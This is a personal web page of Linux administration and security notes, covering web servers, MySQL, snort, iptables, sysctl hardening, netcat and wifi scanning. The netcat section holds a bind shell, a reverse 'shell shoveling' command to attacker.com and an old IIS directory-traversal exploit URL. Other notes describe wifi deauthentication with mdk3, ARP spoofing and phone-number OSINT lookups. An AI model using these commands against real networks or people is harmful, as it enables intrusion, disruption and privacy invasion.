βεη's Development Notes
βεη, remember to start incorporating images into this page.Sticking to text only is no longer prudent.
Also include hyperlinks and click examples into clipboard.
I need to find a better type of TOC local linking.
Review to see if I have any duplicated sections...
Note that this material is currently under developmentand is not yet complete or fully formatted.
This information is exclusivelyfor my own use and those whom I authorize. Any violation will be punished to the full extentof my imagination.
See the Usage Policy Page (https://thepurplefiles.com/usagepolicy.html) for terms of use before proceeding to access or use any of the material on this website ("thepurplefiles.com").
Remember to format and include the raw material commented out at the end of this page.
Locations:
Hiawatha httpd with CGI. See https://www.hiawatha-webserver.org/howto and https://www.hiawatha-webserver.org/howto/monitor
┌──(parth㉿parth)-[~/Spells/Hiawatha/hiawatha-11.3] └─$ sudo hiawatha -h Usage: hiawatha [options] Options: -c <path>: path to where the configrationfiles are located. -d: don't fork to the background. -h: show this information and exit. -k: check configuration and exit. -m: show enabled modules and exit. -v: show version and copyright and exit.
This is a local httpd
┌──(parth㉿parth)-[~] └─$ lighttpd --help lighttpd: invalid option -- '-' lighttpd/1.4.69 (ssl) - a light and fast webserver usage: -f <name> filename of the config-file -m <name> module directory (default: /usr/lib/lighttpd) -i <secs> graceful shutdown after <secs> of inactivity -1 process single (one) request on stdin socket, then exit -p print the parsed config-file in internal form, and exit -t test config-file syntax, then exit -tt test config-file syntax, load and init modules, then exit -D don't go to background (default: go to background) -v show version -V show compile-time features -h show this help
NAME sngrep - SIP Messages flow viewer DESCRIPTION sngrep is a terminal tool that groups SIP (Session Initiation Protocol) Messages by Call-Id, and displays them in arrow flows similar to the used in SIP RFCs. The aim of this tool is to make easier the process of learning or debugging SIP. It recognizes UDP, TCP and partially TLS SIP packets and understands bpf filter logic in the same way ngrep (8) and tcpdump (1) does. RAWSHARK(1) RAWSHARK(1) NAME rawshark - Dump and analyze raw pcap data ┌──(parth㉿Parth)-[/proc] $ capinfos --help Capinfos (Wireshark) 3.6.5 (Git v3.6.5 packaged as 3.6.5-1) Print various information (infos) about capture files. See https://www.wireshark.org for more information. OSINT Phone Numbers Use a VPN when running these. tool: phoneinfoga https://github.com/sundowndev/phoneinfoga/releases $ phoneinfoga scan -n 5023306338 So far, this is not very useful. Great looking website analyser https://freesmscode.com.cutestat.com/ Get Free Phone Codes https://www.freesmscodes.com/ Consider this... https://www.textverified.com/ Great OSINT site https://inteltechniques.com/ This one worked great! Not all the intel is correct. https://thatsthem.com/ mdk3 is a wifi attack tool. looks useful for disruption. the d parameter will kick someone off. Actually it kicks everyone off and keeps kicking them off so they keep trying to reauthenticate while you are sniffing that wifi. $ sudo mdk3 --help
https://wiki.wireshark.org/Tools
$ dumpcap --help Dumpcap (Wireshark) 3.6.5 (Git v3.6.5 packaged as 3.6.5-1) Capture network packets and dump them into a pcapng or pcap file. See https://www.wireshark.org for more information. $ text2pcap --help Text2pcap (Wireshark) 3.6.5 (Git v3.6.5 packaged as 3.6.5-1) Generate a capture file from an ASCII hexdump of packets. See https://www.wireshark.org for more information.
┌──(parth㉿parth)-[/usr] └─$ pskracker --help 16 ⨯ PSKracker 0.2.1 WiFi Security Auditing Toolkit Copyright (c) 2017-2019, soxrok2212 <soxrok2212@gmail.com> Usage: pskracker <arguments> Required Arguments: -t, --target : Target model number Optional Arguments: -b, --bssid : BSSID of target -W, --wps : Output possible WPS pin(s) only -G, --guest : Output possible guest WPA key(s) only -s, --serial : Serial number -f, --force : Force full output -h, --help : Display help/usage Example: pskracker -t (target model) -b (bssid) -s (serial number)
NAME macof - flood a switched LAN with random MAC addresses SYNOPSIS macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times] DESCRIPTION macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). A straight C port of the original Perl Net::RawIP macof program by Ian Vitek <ian.vitek@infosec.se>.
NAME arpspoof - intercept packets on a switched LAN SYNOPSIS arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host DESCRIPTION arpspoof redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traf‐ fic on a switch. Kernel IP forwarding (or a userland program which accomplishes the same, e.g. fragrouter(8)) must be turned on ahead of time.
After an update I often find pipewire-pulse reinstalled. This package kills all sound on my system. Run this command to remove it.
┌──(parth㉿Parth)-[~] └─$ sudo apt purge --autoremove pipewire-pulse
The ANSI code for my perfered date/time format is:
%m.%d.%Y %H:%M:%S
Load a CSV file into a table
mysql> LOAD DATA INFILE '/tmp/filename.csv' replace INTO TABLE [table name] FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n' (field1,field2,field3);
Dump just the inventory database
$ sudo mysqldump -u root -p --databases inventory > inventoryDB.10.05.2020-13:21:49.sql
Export the entier Inventory table to CSV format
/* Note that you can export only into the '/var/lib/mysql-files/' directory */ select id, ifnull(ip,'None'),ifnull(mac,'Unknown'),ifnull(name,'Unknown'), ifnull(location,'unknown'),ifnull(ports,'unknown'),ifnull(type,'Unknown'), ifnull(sn,''),ifnull(os,''),ifnull(firmware,''),ifnull(dante,''), ifnull(ssid,''),ifnull(channel,''),ifnull(frequency,''),ifnull(band,''), ifnull(channelwidth,''),ifnull(strength,''),ifnull(encryption,''), ifnull(notes,''),ifnull(ethernet,'') from inventory into outfile '/var/lib/mysql-files/inventory.csv.export.date.time.csv' fields enclosed by '"' terminated by ';' escaped by '"' lines terminated by '\r\n';
Load a CSV file into a table. Save the sheet as csv, remove the title line, and save
mysql> LOAD DATA LOCAL INFILE '~/CCCC/Tech/database/CCCC.Network.Inventory.csv' replace INTO TABLE inventory FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n' (ip, mac, name, location, type, sn, os, firmware, ssid, channel, frequency, band, encryption, notes);
Insert new record
INSERT INTO table_name (column1, column2, column3, ...) VALUES (value1, value2, value3, ...); MariaDB [inventory]> insert into inventory (mac, ip, name, os) values ('00:1b:9e:37:4a:15', '192.168.3.127', 'OfficeVolunteer', 'Windows Vista Home Premium - Service Pack 2. 32-bit OS');
GROUP BY select mac,count(*) as Total from inventory group by mac order by Total desc;
Insert new record if a field value does not exist
INSERT INTO inventory (mac) SELECT 'e8:9f:80:43:55:04' WHERE NOT EXISTS (Select mac From inventory WHERE mac ='e8:9f:80:43:55:04') LIMIT 1;
Finding counts in mysql
select mac, COUNT(*) from inventory group by mac ; select ip, COUNT(*) from inventory group by ip ; select ip, COUNT(*) from inventory group by ip HAVING COUNT(*) >= 1 order by count(*); select ip, COUNT(*) from inventory group by count(*) having COUNT(*) >= 1 ;
List available APs
$ nmcli dev wifi list
Compress an Entire Directory or a Single File
$ tar -czvf name-of-archive.tar.gz /path/to/directory-or-file
List all local socket connections
$ sudo netstat -atnp | grep "ESTABLISHED\|LISTEN" | awk '{printf "%-25s %-10s %-25s %-20s\n",$7,$1,$4,$5}' | sed /^-/d | sed 's/\// /g'
Backup your installs aps
$ sudo apt-clone clone --with-dpkg-repack ~/my.system/apt-clone-packages
The find command
$ find /home/username/ -name "*.err"
This file has become too large for a traditional TOC search mechinism. I need to consider some other approach.
---[Command Info]--- (top)
Ben, flesh this out...
$ whatis cmd $ whereis cmd $ apropos cmd $ cmd -h or --help $ man cmd
---[wordlists]--- (top)
---[snort]--- (top)
Getting started with Snort’s Packet Logger mode
Start logging packets
$ sudo snort -d -l /var/log/snort/ -h 192.168.1.0/24 -A console -c /etc/snort/snort.conf
Read stored packets
# snort -d -v -r /home/parth/Hacking/logfilename.log.xxxxxxx
# snort -dev -r /var/log/snort/snort.log.1037840339| more
Setting up a service file to auto launch snort
sudo nano /lib/systemd/system/snort.service
Add this material and save the file (f3 and then f2)
[Unit] Description=Snort NIDS Daemon After=syslog.target network.target [Service] Type=simple ExecStart=/usr/local/bin/snort -q -c /etc/snort/snort.conf -i eth0 [Install] WantedBy=multi-user.target sudo systemctl enable snort Synchronizing state of snort.service with SysV service script with /lib/systemd/systemd-sysv-install. Executing: /lib/systemd/systemd-sysv-install enable snort Created symlink /etc/systemd/system/multi-user.target.wants/snort.service → /lib/systemd/system/snort.service. sudo systemctl start snort sudo systemctl status snort snort.service - Snort NIDS Daemon Loaded: loaded (/lib/systemd/system/snort.service; enabled; vendor preset: disabled) Active: active (running) since Mon 2019-12-09 13:07:15 EST; 6s ago Main PID: 7109 (snort) Tasks: 2 (limit: 9343) Memory: 143.8M CGroup: /system.slice/snort.service 7109 /usr/sbin/snort -q -c /etc/snort/snort.conf -i wlan0 Dec 09 13:07:15 wintermute systemd[1]: Started Snort NIDS Daemon. ps aux | grep -i snort root 6674 0.0 0.0 8360 4120 pts/2 S+ 12:59 0:00 sudo snort -d -l /var/log/snort/ -h 192.168.1.0/24 -A console -c /etc/snort/snort.conf root 6675 0.2 1.9 569148 154976 pts/2 Sl+ 12:59 0:01 snort -d -l /var/log/snort/ -h 192.168.1.0/24 -A console -c /etc/snort/snort.conf root 7109 3.7 1.8 567716 151232 ? Ssl 13:07 0:01 /usr/sbin/snort -q -c /etc/snort/snort.conf -i wlan0
Getting started with Snort’s Network Intrusion Detection System (NIDS) mode
With the following command Snort reads the rules specified in the file /etc/snort/snort.conf to filter the traffic properly, avoiding reading the whole traffic and focusing on specific incidents referred in the snort.conf through customizable rules.
The parameter “-A console” instructs snort to alert in the terminal.
# snort -d -l snortlog -h 10.0.0.0/24 -A console -c snort.conf
IDS mode with logging in pcap format and echo to console
# sudo snort -c /etc/snort/snort.conf -i wlan0 -l /var/log/snort/ -b -A console -P 65535
In this default confguration, Snort sends logs in tcpdump format to the /var/log/snort directory. Line 471 enables what Snort calls unied logging. This type of logging logs both the complete packet and the alerts. For now, let's uncomment this type of output (unied2) and comment out line 481.
Ref. https://linuxhint.com/snort-ubuntu-tutorial/
Edit /etc/snort/snort.conf to change 'any' to 192.168.1.0/24
sudo snort -d -l /var/log/snort/ -h 192.168.1.0/24 -A console -c /etc/snort/snort.conf
Where: d= tells snort to show data l= determines the logs directory h= specifies the network to monitor A= instructs snort to print alerts in the console c= specifies Snort the configuration file
Since we instructed Snort to save logs, we can read them by running:
# snort -r
Also see: https://linuxhint.com/configure-snort-ids-create-rules/ https://www.securityarchitecture.com/learning/intrusion-detection-systems-learning-with-snort/configuring-snort-on-linux/
Ensure Syslog, Rsyslogd or Syslog-NG is configured to log any LOG_AUTH and LOG_ALERT,
This shows snort alerts
$ cat -v auth.log | grep -i "snort" # sudo snort -d -s -v -u snort snort -c /etc/snort/snort.conf -h 192.168.2.0/24
Where: -A = instructs snort to print alerts in the console -D = Deamon mode -d = tells snort to show data -b = pcap format -c = specifies Snort the configuration file -h = specifies the network to monitor -l = determines the logs directory -P = snaplenght -s = log to syslog -v = verbose
$ sudo snort -P0 -s -v -d -l /var/log/snort/ -h 192.168.2.0/24 -c /etc/snort/snort.conf
Dumping the pcap log
$ sudo tcpdump -s0 -xX -r /var/log/snort/snort.log.1567367664
$ ls -tor /var/log/snort/
---[swatch]---top
swatchdog -c ~/.swatchdogrc -t /var/log/syslog
or
swatchdog -c ~/.swatchdogrc -t /var/log/syslog --daemon $ swatchdog .swatchdogrc
---[Apache2]--- (top)
Install with
sudo apt install apache2
Following are some basic commands to manage Apache processes.
Restart apache web server type following command:
sudo systemctl restart apache2
Stop web server type following command:
sudo systemctl stop apache2
To start web server type following command:
sudo systemctl start apache2
Reload configuration file typing following command:
sudo systemctl reload apache2
Apache service will start after boot to disable this run below command:
sudo systemctl disable apache2
To enable Apache service to start after boot run:
sudo systemctl enable apache2
Following are the Apache important files and directories:
Enabling CGI:
ben@benb:/etc/apache2/sites-available$ sudo a2enmod cgi
Your MPM seems to be threaded. Selecting cgid instead of cgi. Enabling module cgid. To activate the new configuration, you need to run: systemctl restart apache2
ben@benb:/etc/apache2/sites-available$ systemctl restart apache2
sudo ln -s /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/
Create a test.cgi file that is a perl script with a .cgi suffix. Then set it's mod.
ben@benb:/usr/lib/cgi-bin$ cat test.cgi #!/usr/bin/perl print "Content-type: text/html\n\n"; print "Hello world";
sudo chmod 755 /usr/lib/cgi-bin/test.cgi
After running these you can open the index.html file at http://127.0.0.1:80
$ sudo service apache2 start $ service apache2 status
## Start command ##
$ sudo systemctl start apache2.service
## Stop command ##
$ sudo systemctl stop apache2.service
## Restart command ##
$ sudo systemctl restart apache2.service
---[iptables]--- (top)
In Linux generally, "iptables" isn't a service - it's a command to manipulate the netfilter kernel firewall. You can "disable" (or stop) the firewall by setting the default policies on all standard chains to "ACCEPT", and flushing the rules.
$ sudo iptables -P INPUT ACCEPT $ sudo iptables -P OUTPUT ACCEPT $ sudo iptables -P FORWARD ACCEPT $ sudo iptables -F $ service iptables stop
Starting and stopping the service
$ sudo service iptables start $ sudo service iptables stop
UFW (/usr/sbin/ufw) is a front-end for iptables, to make managing a Netfilter firewall easier, hence the name “Uncomplicated Firewall”.
Is iptables running
$ systemctl status iptables
See what rules are already configured.
$ sudo iptables -L As of 083019 $ sudo iptables -L [sudo] password for parth: Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination
Detailed list of iptables
$ sudo iptables -L -v
Delete the rules of iptables
$ sudo iptables -F
Blocking a specific IP
$ sudo iptables -A INPUT -S 10.10.10.10 -j DROP
Blocking an IP range
$ sudo iptables -A INPUT -s 10.10.10.10.0/24 -j DROP
$ sudo iptables -A INPUT -s 10.10.10.0/255.255.255/.0 -j DROP
Blocking a single port:
$ sudo iptables -A INPUT -p tcp —dport ssh -s 10.10.10.10 -j DROP
Allowing all outbound traffic
# iptables -A OUTPUT -j ACCEPT
Stopping iptables
$ sudo systemctl stop iptables $ sudo systemctl disable iptables
Resources https://www.linuxbabe.com/security/ufw-firewall-debian-ubuntu-linux-mint-server
---[HTML Character Entities]--- (top)
A character entity has three parts: an ampersand (&), an entity name or a # and an entity number, and finally a semicolon (;). Note that the entities are case sensitive.
The Most Common Character Entities:
https://dev.w3.org/html5/html-author/charref
---[netcat nc]--- (top)
Examples
Setup a listener > nc -v -v -l -d -e cmd.exe -p 5000 Get the shell > nc -v -v 127.0.0.1 5000
[Using netcat to pull banners]
You can use nc to pull banners. nc 127.0.0.1 80 HEAD / HTTP/1.0
The results will include, "Server: Microsoft IIS/4.0" for example.
[Using netcat to get an HTTPd host's non-routable IP address]
Ref: http://www.nextgenss.com/advisories/iisip.txt
nc 127.0.0.1 80 PROPFIND / HTTP/1.1 Host: Content-Length: 0
[netcat shell shoveling]
Ref: pentest@securityfocous.com post Oct. 2, 2001 by Junginger, Jeremy.
nc attacker.com 80 | cmd.exe | nc attacker.com 25
If the attacker is listening on TCP 80 and 25, and TCP 80 is allowed inbound and 25 is allowed outbound to/from the target through the firewal, then the above command 'shovels' a remote command shell from the target to attacker.com.
[Using netcat to HTTPTunnel]
Ref: http://www.codetools.com/internet/httpunneling.asp
HTTPTunneling is making an arbitrary TCP connection through a proxy.
nc 127.0.0.1 80 CONNECT <dest_IP>:<dest:port> HTTP/1.1<CR><LF> <header_line>:<CR><LF> <header_line>:<CR><LF> ... <CR><LF><CR><LF>
If the proxy's response is code 200 then after the empty line the proxy begins function as a tunnel between you and the target.
If the proxy requiers authorization, simply supply it by including the Proxy-Authorization header.
[Using netcat to check for proxies]
You can also check for a frontend proxy with nc.
nc 127.0.0.1 80 TRACE / HTTP/1.0
The result report will show this to be the proxy, and in the Trace section at the end, you will get the HOST: IPNumber of the actual web host!
[Using netcat to send URL hacks]
Another great use for netcat, you can (manually or scripted) send http requests and recieve the pages to the console. This is great for sending URL exploits. You can create your own headers, pass query strings, attempt malcode injection, and exploit HTTP methods and headers.
nc 127.0.0.1 80 (enter once) GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
---[Find the version of Linux]--- (top)
$ uname -a Linux wintermute 4.15.0-65-generic #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
And more specifically which version of Mint
$ cat /etc/linuxmint/info RELEASE=19.2 CODENAME=tina EDITION="Cinnamon" DESCRIPTION="Linux Mint 19.2 Tina" DESKTOP=Gnome TOOLKIT=GTK NEW_FEATURES_URL=https://www.linuxmint.com/rel_tina_cinnamon_whatsnew.php RELEASE_NOTES_URL=https://www.linuxmint.com/rel_tina_cinnamon.php USER_GUIDE_URL=https://www.linuxmint.com/documentation.php GRUB_TITLE=Linux Mint 19.2 Cinnamon
---[mysqld]--- (top)
This is how you run a .sql batch file from the command line
┌──(parth㉿parth)-[~/Hacking/Password.Cracking/passwords] $ sudo mariadb cracking < runinsert.sql > results.tab -u root
Each line in the .sql file must be a valid sql statement of any type. This is MUCH more efficient than pasting blocks of lines into a shell.
These are the steps to install mysql per https://www.kali.org/tools/mysql-defaults/
1541 sudo apt install default-libmysqld-dev 1542 sudo apt install default-mysql-client 1543 sudo apt install default-mysql-client-core 1544 sudo apt install default-mysql-server 1545 sudo apt install default-mysql-server-core 1546 sudo apt install mysql-common 1547 sudo apt autoremove $ sudo mysql_secure_installation
# sudo /etc/init.d/mysql start # sudo /etc/init.d/mysql stop # sudo /etc/init.d/mysql restart # sudo systemctl status mysql # sudo systemctl disable mysql # service mysql start # service mysql status # mysql -u root Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 49 Server version: 10.3.18-MariaDB-1 Debian buildd-unstable Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | +--------------------+ 3 rows in set (0.001 sec)
---[aescrypt]--- (top)
Suppose you have a file called "picture.jpg" that you would like to encrypt using the password "apples". You would enter the following command:
$ aescrypt -e -p apples picture.jpg
You could backup files and encrypt them with a command like this:
$ tar -cvf -/home | aescrypt -e -p apples -> backup_files.tar.aes
Rather than include the password in the command line, do not include the -p parameter:
$ aescrypt -d picture.jpg.aes
What if you just want to have it displayed on the screen and not stored in a plaintext file? Use this syntax:
$ aescrypt -d -o -passwords.txt.aes
Generate a private key:
$ aescrypt_keygen -p apples secret.key
The key file is nothing more than a UTF-16LE encoded file containing the password. One can use Notepad on Windows to create a key file. Just save the file using the "Unicode" format when saving.
Now when you wish to encrypt afile, you call AES Crypt like this:
$ tar -cvf -/home | aescrypt -e -k secret.key ->backup_files.tar.aes
---[Report system specs]--- (top)
$ sudo lshw
Or
$ inxi -Fxz
$ sudo lshw -short
---[sysctl]--- (top)
DESCRIPTION sysctl is used to modify kernel parameters at runtime. The parameters available are those listed under /proc/sys/. Procfs is required for sysctl support in Linux. You can use sysctl to both read and write sysctl data.
Kernel parameter values changed using the ‘systctl -w’ method are volatile i.e. lost on server reboot. The sysctl utility’s configuration file, /etc/sysctl.conf, should be used to permanently store non-default kernel parameter values. The file is parsed on server boot and values within are used to configure the kernel.
The syntax required to configure kernel parameters using the /etc/sysctl.conf file follows the component.parameter=value notation
Edit /etc/sysctl.conf or /etc/sysctl.d/99-custom.conf and update it as follows. The file is documented with comments. However, I recommend reading the official Linux kernel sysctl tuning help file (see below): (https://www.cyberciti.biz/faq/linux-kernel-etcsysctl-conf-security-hardening/)
# The following is suitable for dedicated web server, mail, ftp server etc. # --------------------------------------- # BOOLEAN Values: # a) 0 (zero) - disabled / no / false # b) Non zero - enabled / yes / true # -------------------------------------- # Controls IP packet forwarding net.ipv4.ip_forward = 0 # Do not accept source routing net.ipv4.conf.default.accept_source_route = 0 # Controls the System Request debugging functionality of the kernel kernel.sysrq = 0 # Controls whether core dumps will append the PID to the core filename # Useful for debugging multi-threaded applications kernel.core_uses_pid = 1 # Controls the use of TCP syncookies # Turn on SYN-flood protections net.ipv4.tcp_syncookies = 1 net.ipv4.tcp_synack_retries = 5 ########## IPv4 networking start ############## # Send redirects, if router, but this is just server # So no routing allowed net.ipv4.conf.all.send_redirects = 0 net.ipv4.conf.default.send_redirects = 0 # Accept packets with SRR option? No net.ipv4.conf.all.accept_source_route = 0 # Accept Redirects? No, this is not router net.ipv4.conf.all.accept_redirects = 0 net.ipv4.conf.all.secure_redirects = 0 # Log packets with impossible addresses to kernel log? yes net.ipv4.conf.all.log_martians = 1 net.ipv4.conf.default.accept_source_route = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv4.conf.default.secure_redirects = 0 # Ignore all ICMP ECHO and TIMESTAMP requests sent to it via broadcast/multicast net.ipv4.icmp_echo_ignore_broadcasts = 1 # Prevent against the common 'syn flood attack' net.ipv4.tcp_syncookies = 1 # Enable source validation by reversed path, as specified in RFC1812 net.ipv4.conf.all.rp_filter = 1 # Controls source route verification net.ipv4.conf.default.rp_filter = 1 ########## IPv6 networking start ############## # Number of Router Solicitations to send until assuming no routers are present. # This is host and not router net.ipv6.conf.default.router_solicitations = 0 # Accept Router Preference in RA? net.ipv6.conf.default.accept_ra_rtr_pref = 0 # Learn Prefix Information in Router Advertisement net.ipv6.conf.default.accept_ra_pinfo = 0 # Setting controls whether the system will accept Hop Limit settings from a router advertisement net.ipv6.conf.default.accept_ra_defrtr = 0 #router advertisements can cause the system to assign a global unicast address to an interface net.ipv6.conf.default.autoconf = 0 #how many neighbor solicitations to send out per address? net.ipv6.conf.default.dad_transmits = 0 # How many global unicast IPv6 addresses can be assigned to each interface? net.ipv6.conf.default.max_addresses = 1 ########## IPv6 networking ends ############## #Enable ExecShield protection #Set value to 1 or 2 (recommended) #kernel.exec-shield = 2 #kernel.randomize_va_space=2 # TCP and memory optimization # increase TCP max buffer size setable using setsockopt() #net.ipv4.tcp_rmem = 4096 87380 8388608 #net.ipv4.tcp_wmem = 4096 87380 8388608 # increase Linux auto tuning TCP buffer limits #net.core.rmem_max = 8388608 #net.core.wmem_max = 8388608 #net.core.netdev_max_backlog = 5000 #net.ipv4.tcp_window_scaling = 1 # increase system file descriptor limit fs.file-max = 65535 #Allow for more PIDs kernel.pid_max = 65536 #Increase system IP port limits net.ipv4.ip_local_port_range = 2000 65000 # RFC 1337 fix net.ipv4.tcp_rfc1337=1
$ sysctl --help Usage: sysctl [options] [variable[=value] ...] Reject PING requests $ sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1 List all vars and their values $ sudo sysctl -a | more
---[Viewing log messages]--- (top)
# journalctl # journalctl -u network.service # journalctl -u ssh.service # journalctl -f # journalctl -k
---[Check for accounts with root access]--- (top)
Only root account have UID 0 with full permissions to access the system. Type the following command to display all accounts with UID set to 0:
# awk -F: '($3 == "0") {print}' /etc/passwd
---[Report services and runlevels]---Print a list of services that lists which runlevels each is configured on or off
# systemctl list-unit-files --type=service # systemctl list-dependencies graphical.target
---[cups]--- (top)
One can access CUPS with their browser. Fire up your browser and go to the following URL.
http://localhost:631/
---[List available access points]--- (top)
$ nmcli dev wifi list IN-USE SSID MODE CHAN RATE SIGNAL BARS SECURITY ATTFJ4Br3A Infra 6 195 Mbit/s 100 ▂▄▆█ WPA2 -- Infra 153 540 Mbit/s 100 ▂▄▆█ WPA2 ATTFJ4Br3A Infra 153 540 Mbit/s 89 ▂▄▆█ WPA2 ATTB2f6CTA Infra 6 195 Mbit/s 85 ▂▄▆█ WPA2 -- Infra 153 130 Mbit/s 79 ▂▄▆_ WPA2 -- Infra 1 130 Mbit/s 75 ▂▄▆_ WPA2 ATTB2f6CTA Infra 153 540 Mbit/s 62 ▂▄▆_ WPA2 -- Infra 153 540 Mbit/s 59 ▂▄▆_ WPA2 DIRECT-65-HP ENVY 4510 series Infra 11 65 Mbit/s 49 ▂▄__ WPA2 -- Infra 153 405 Mbit/s 45 ▂▄__ WPA2 ATTB2f6CTA Infra 1 130 Mbit/s 42 ▂▄__ WPA2 Peasants Infra 11 130 Mbit/s 42 ▂▄__ WPA2 ATTB2f6CTA Infra 153 405 Mbit/s 42 ▂▄__ WPA2 ATTPSHiJ4I Infra 1 195 Mbit/s 39 ▂▄__ WPA2 ATTAG2GTA2 Infra 1 195 Mbit/s 39 ▂▄__ WPA2 NewThermostat_B75111 Infra 6 65 Mbit/s 35 ▂▄__ -- ARRIS-7FDB Infra 11 195 Mbit/s 35 ▂▄__ WPA2 belkin.e80_2GEXT Infra 2 270 Mbit/s 32 ▂▄__ WPA2 Nobility Infra 11 130 Mbit/s 32 ▂▄__ WPA2 ATTMaSk44I Infra 1 195 Mbit/s 29 ▂___ WPA2 Serenity Infra 8 130 Mbit/s 29 ▂___ WPA2 IN-USE SSID MODE CHAN RATE SIGNAL BARS SECURITY * ATTFJ4Br3A Infra 6 195 Mbit/s 76 ▂▄▆_ WPA2
$ sudo lshw -C network *-network description: Ethernet interface product: RTL810xE PCI Express Fast Ethernet controller vendor: Realtek Semiconductor Co., Ltd. physical id: 0 bus info: pci@0000:01:00.0 logical name: enp1s0 version: 07 serial: 74:86:7a:5d:35:b1 size: 10Mbit/s capacity: 100Mbit/s width: 64 bits clock: 33MHz capabilities: pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration: autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3LK-NAPI duplex=half firmware=rtl8106e-1_0.0.1 06/29/12 latency=0 link=no multicast=yes port=MII speed=10Mbit/s resources: irq:18 ioport:3000(size=256) memory:b0600000-b0600fff memory:b0400000-b0403fff *-network DISABLED description: Wireless interface product: Wireless 7260 vendor: Intel Corporation physical id: 0 bus info: pci@0000:02:00.0 logical name: wlp2s0 version: 73 serial: fc:f8:ae:26:86:ee width: 64 bits clock: 33MHz capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless configuration: broadcast=yes driver=iwlwifi driverversion=4.15.0-65-generic firmware=17.948900127.0 ip=192.168.1.72 latency=0 link=no multicast=yes wireless=IEEE 802.11 resources: irq:47 memory:b0500000-b0501fff *-network description: Wireless interface physical id: 2 bus info: usb@1:1.3 logical name: wlx00c0ca8f2b07 serial: 00:c0:ca:8f:2b:07 capabilities: ethernet physical wireless configuration: broadcast=yes driver=rt2800usb driverversion=4.15.0-65-generic firmware=0.36 ip=192.168.1.73 link=yes multicast=yes wireless=IEEE 802.11
ben@ben-b:~$ sudo iwlist wlp2s0 scan wlp2s0 Scan completed : Cell 01 - Address: BC:A5:11:99:2E:3A Channel:153 Frequency:5.765 GHz Quality=55/70 Signal level=-55 dBm Encryption key:on ESSID:"ATTFJ4Br3A_5GEXT" Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 0010415454464A34427233415F3547455854 IE: Unknown: 01088C129824B048606C IE: Unknown: 030199 IE: Unknown: 2D1AEF0903FFFF00000000000000000000010 0000000000000000000 IE: Unknown: 3D16990701000000000000000000000000000 00000000000 IE: Unknown: 7F0800000F0200000040 IE: Unknown: BF0CB2498933FAFF0000FAFF0000 IE: Unknown: C005019B00FCFF IE: Unknown: DD180050F2020101800003A4000027A40000 42435E0062322F00 IE: Unknown: DD0900037F01010000FF7F IE: Unknown: DD870050F204104A0001101044000102103B0001031047001 0876543219ABCDEF01234BCA511992E38102100044E544752102 3000845583631353076321024000256321042000D344C5636394 2355941303044361054000800060050F204000110110015455836 313530763228576972656C65737320415029100800022008104 9000600372A000120 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK Cell 02 - Address: 86:8F:CF:75:BE:03 Channel:153 Frequency:5.765 GHz Quality=34/70 Signal level=-76 dBm Encryption key:on ESSID:"ATTB2f6CTA" Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 000A41545442326636435441 IE: Unknown: 01088C1218243048606C IE: Unknown: 030199 IE: Unknown: 0B0500000EFFFF IE: Unknown: 074C55532024017F28017F2C017F30017F34017F38017F3C017F 40017F64017F68017F6C017F70017F74017F78017F7C017F8001 7F84017F88017F8C017F90017F95017F99017F9D017FA1017F00 IE: Unknown: 200100 IE: Unknown: C305027F7F7F00 IE: Unknown: 2D1AEF0117FFFFFFFFFEFFFFFFFF1F000001000000000018E6E71900 IE: Unknown: 3D1699071500000000000000000000000000000000000000 IE: Unknown: DD180050F2020101860003A4000023A4000043A4000063A40000 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 7F080100080200000040 IE: Unknown: DDA30050F204104A0001101044000102103B0001031 0470010A61ECC86A44EB89E90A0F6E896C62240102100 095175616E74656E6E6110230005546F70617A1024000 64247573231301042000C383638464346373542453033 1054000800060050F2040001101100105265666572656 E63652044657369676E1008000220081049000600372A 00012010580018E02F603829387C2ED6909E6406A02B5 00001010103007FC5 IE: Unknown: BF0CB279C33FAAFF0000AAFF0000 IE: Unknown: C005019B00FCFF IE: Unknown: DD1E002686010300DD000000250406 920006019B5B8CD2740000000000000000 Cell 03 - Address: C6:52:61:97:05:B3 Channel:153 Frequency:5.765 GHz Quality=70/70 Signal level=-38 dBm Encryption key:on ESSID:"ATTFJ4Br3A" Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 000A415454464A3442723341 IE: Unknown: 01088C1218243048606C IE: Unknown: 030199 IE: Unknown: 0B0505000CFFFF IE: Unknown: 074C55532024017F28017F2C017F30017F34017F38017F 